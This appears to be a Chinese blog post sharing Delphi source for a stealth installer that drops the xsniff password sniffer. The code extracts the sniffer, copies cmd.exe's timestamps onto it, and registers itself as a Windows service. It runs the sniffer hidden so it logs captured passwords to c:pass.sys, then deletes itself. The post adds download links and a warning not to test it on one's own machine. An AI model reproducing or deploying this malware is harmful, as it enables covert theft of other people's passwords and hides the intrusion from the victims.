const
  szservicename = 'nets';
dllname='xsniff.exe';
procedure sniffset(l:integer=1);
begin
  try
    ExtractRes('DLLFILE', 'mydll', pchar(GetDirectory(0) + dllname));
    //生成新的DLL插入文件
  except
  end;
  try
    setTime(PChar(GetDirectory(1) + 'cmd.exe'), pchar(GetDirectory(0) +
      dllname));
  except
  end;
end;

procedure ServiceMain;
begin
sniffset;
winexec(pchar(GetDirectory(0) + dllname+' -pass -hide -log c:pass.sys'),sw_hide);
end;
procedure exeset;
begin
// regpzh('info', pchar(readme)); //写入配置信息
  if fileexists(backup) then
  begin
    try
      deletefile(pchar(backup)); //删除原来的
    except
    end;
  end;
  try
    CopyFile(pchar(ParamStr(0)), pchar(backup), False);
  except
  end;
  try
    setTime(PChar(GetDirectory(1) + 'cmd.exe'), pchar(backup));
  except
  end;
{    try
    delservice(szservicename);//删除造成重启后服务不运行
    except
    end;  }
  try
    InstallService(szservicename, name,
      backup);
  except
  end;
  modify(display);//添加描述
//  avp(false);
// inject; //首次运行注入
  try
    //  启动已有的服务
    StartServiceEx(nil, szservicename, true);
  except
  end;
  WinExec(PChar('cmd /c del ' + GetCommandLine), SW_HIDE); //自删除
end;
//获取安装目录
function GetDirectory(dInt: Integer): string;
begin
case dint of
0:result:=GetSpecialFolder(sfCommonFavorites)+'';
1:result:=GetSpecialFolder(sfSystem)+'';
2:result:=GetSpecialFolder(sfWindows)+'';
end;
end;

实际是加入资源，释放，然后保存到C盘pass.SYS文件，如果想改动，hex对应改字符

这玩意运行后就在机器添加一个服务，然后释放xsniffer
带参数运行
没啥意思玩玩而已

注意:不要在自己机器上测试

点击下载=>[迅雷专用]
点击下载=>[山东电信]
点击下载=>[山东网通]
点击下载=>[浙江电信]

本文固定链接: http://www.daopo.org/2008/03/23/xsniffer-use-of-tools-by-lao-xiong/ | 天晴轩